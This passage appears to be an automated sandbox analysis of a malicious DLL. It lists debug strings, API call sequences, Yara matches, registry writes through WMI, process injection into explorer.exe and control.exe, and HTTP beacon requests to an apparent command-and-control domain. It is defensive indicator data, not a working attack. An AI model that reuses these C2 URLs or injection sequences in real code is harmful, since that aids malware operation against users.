Source: | Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp |
Source: | Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp |
Source: | Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp |
Source: | Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp |
Source: | Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp |
Source: | Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp |
Source: | Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp |
Source: | Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp |
Source: | Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp |
Source: | Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp |
Source: | Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp |
Source: | Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp |
Source: | Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: | Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp |
Source: | Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, | 0_2_004051E8 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, | 0_2_02F37AA8 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, | 1_2_004051E8 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose, | 37_2_04DBA0C4 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, | 37_2_04DBEEAC |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege, | 37_2_04DB537C |
Source: global traffic | HTTP traffic detected: GET /manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: PHPSESSID=eshdo6go4uelgf2o7eta3f2t14; lang=en |
Source: global traffic | HTTP traffic detected: GET /manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en |
Source: global traffic | HTTP traffic detected: GET /manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comConnection: Keep-AliveCookie: lang=en |
Source: loaddll32.exe, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 0000001E.00000003.825326086.0000026F5A0BB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.micr |
Source: WerFault.exe, 00000004.00000003.659243979.0000000005012000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft |
Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 0000001E.00000002.894428484.0000026F5BAB1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: Yara match | File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_004225C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, | 1_2_004225C8 |
Source: Yara match | File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044C8CC NtdllDefWindowProc_A,GetCapture, | 0_2_0044C8CC |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0042863C NtdllDefWindowProc_A, | 0_2_0042863C |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_0044281C GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, | 0_2_0044281C |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00439348 NtdllDefWindowProc_A, | 0_2_00439348 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, | 0_2_00439AF0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, | 0_2_00439BA0 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02C914E8 NtCreateSection,memset, | 0_2_02C914E8 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02C9183B NtMapViewOfSection, | 0_2_02C9183B |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02C922C5 NtQueryVirtualMemory, | 0_2_02C922C5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F372D8 NtMapViewOfSection, | 0_2_02F372D8 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F31371 GetProcAddress,NtCreateSection,memset, | 0_2_02F31371 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F37507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, | 0_2_02F37507 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F3B2F1 NtQueryVirtualMemory, | 0_2_02F3B2F1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_0044C8CC NtdllDefWindowProc_A,GetCapture, | 1_2_0044C8CC |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_0042863C NtdllDefWindowProc_A, | 1_2_0042863C |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_0044281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, | 1_2_0044281C |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00439348 NtdllDefWindowProc_A, | 1_2_00439348 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, | 1_2_00439AF0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, | 1_2_00439BA0 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_045422C5 NtQueryVirtualMemory, | 1_2_045422C5 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA14D0 NtQueryInformationProcess, | 37_2_04DA14D0 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC20B4 NtQueryInformationProcess, | 37_2_04DC20B4 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC4064 NtMapViewOfSection, | 37_2_04DC4064 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA7008 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose, | 37_2_04DA7008 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA5DF4 RtlAllocateHeap,NtCreateSection, | 37_2_04DA5DF4 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DC7278 NtWriteVirtualMemory, | 37_2_04DC7278 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DA527C NtAllocateVirtualMemory, | 37_2_04DA527C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB6A74 NtQuerySystemInformation, | 37_2_04DB6A74 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB2FD0 NtQueryInformationProcess, | 37_2_04DB2FD0 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DBFF54 NtReadVirtualMemory, | 37_2_04DBFF54 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DAEF1C NtSetContextThread,NtUnmapViewOfSection,NtClose, | 37_2_04DAEF1C |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DB4B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification, | 37_2_04DB4B24 |
Source: C:\Windows\explorer.exe | Code function: 37_2_04DDA002 NtProtectVirtualMemory,NtProtectVirtualMemory, | 37_2_04DDA002 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00117008 NtQueryInformationToken,NtQueryInformationToken,NtClose, | 38_2_00117008 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00134064 NtMapViewOfSection, | 38_2_00134064 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_001320B4 NtQueryInformationProcess, | 38_2_001320B4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_001114D0 NtQueryInformationProcess, | 38_2_001114D0 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00115DF4 NtCreateSection, | 38_2_00115DF4 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_00137278 NtWriteVirtualMemory, | 38_2_00137278 |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011527C NtAllocateVirtualMemory, | 38_2_0011527C |
Source: C:\Windows\System32\control.exe | Code function: 38_2_0011EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose, | 38_2_0011EF1C |
